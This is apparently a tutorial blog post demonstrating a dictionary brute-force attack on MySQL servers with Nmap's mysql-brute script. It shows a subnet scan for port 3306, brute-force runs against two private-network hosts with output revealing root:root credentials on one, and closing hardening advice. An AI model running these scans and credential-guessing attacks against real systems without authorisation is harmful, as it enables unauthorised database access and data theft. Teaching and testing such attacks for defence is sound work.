In this tutorial, I’ll be demostrating brute force attack on MySQL Database Server using Nmap Script Scan.
Before we move ahead, Let us understand about Brute Force Attack & Nmap Scripting Engine
What is Brute Force Attack?
In cryptography, a brute-force attack consists of an attacker submitting many passwords or passphrases with the hope of eventually guessing correctly. The attacker systematically checks all possible passwords and passphrases until the correct one is found. This task are performed by Scripts or Automated Tools.
In short, script will try username & password from list available & this is also called Dictionary based attack.
Nmap comes with known username & password list, which can be found on path /usr/share/nmap/nselib/data
What is Nmap Scripting Engine?
Nmap Scripting Engine facilitate Nmap to interact with target using Scripts written in Lua Programming Language.
With the installation Nmap comes with default Scripts which can be found on path /usr/share/nmap/scripts
So, Let us perform Brute Force Attack on Target MySQL Server using below mentioned steps
1. Need to check System running MySQL on Target Network using below command.
iamvsm@SaraswatiRepository:~$ nmap -p 3306 --open 192.168.20.0/24
Nmap scan report for 192.168.20.77
Host is up (0.00058s latency).
PORT STATE SERVICE
3306/tcp open mysql
Nmap scan report for 192.168.20.91
Host is up (0.00051s latency).
PORT STATE SERVICE
3306/tcp open mysql
Nmap scan report for 192.168.20.107
Host is up (0.00048s latency).
PORT STATE SERVICE
3306/tcp open mysql
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.05 seconds
Note: Port 3306 is MySQL Server Application Port & –open will show Systems with open ports only.
As we can see that there are Three MySQL Server running on Target Network 192.168.20.0/24 respectively.
Now we’ll select any one of them to perform MySQL Brute Force Attack. Let’s say we’ll perform attack on MySQL Server – 192.168.20.77
2. Performing Brute Force Attack on MySQL Server using Nmap Script
iamvsm@SaraswatiRepository:~$ nmap –script mysql-brute -p 3306 192.168.20.77
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 17:05 IST
Nmap scan report for 192.168.20.77
Host is up (0.00065s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-brute:
| Accounts:
| root:root - Valid credentials
|_ Statistics: Performed 45027 guesses in 8 seconds, average tps: 5628.4
Nmap done: 1 IP address (1 host up) scanned in 7.87 seconds
Succesfully, we are able to find out username & password of MySQL Server by Brute Force Attack using Nmap Script “mysql-brute.nse” (Available on path /usr/share/nmap/scripts)
We’ll also try on another Servers, Let’s say 192.168.20.107
iamvsm@SaraswatiRepository:~$ nmap --script mysql-brute -p 3306 192.168.20.107
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-09 17:13 IST
Nmap scan report for 192.168.20.107
Host is up (0.00055s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 50029 guesses in 11 seconds, average tps: 4548.1
Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds
On this we failed, because this server has kept it’s MySQL Username & Password Strong. This attack only works when you have kept default or known username & password based on dictionary.
Recommendation
It is recommended to keep your Database credentials strong & deny root login remotely. Permit only Webserver to communicate to Database Server rather than making it open for all.
In my upcoming post I’ll illustrate how to secure your MySQL Database Server.
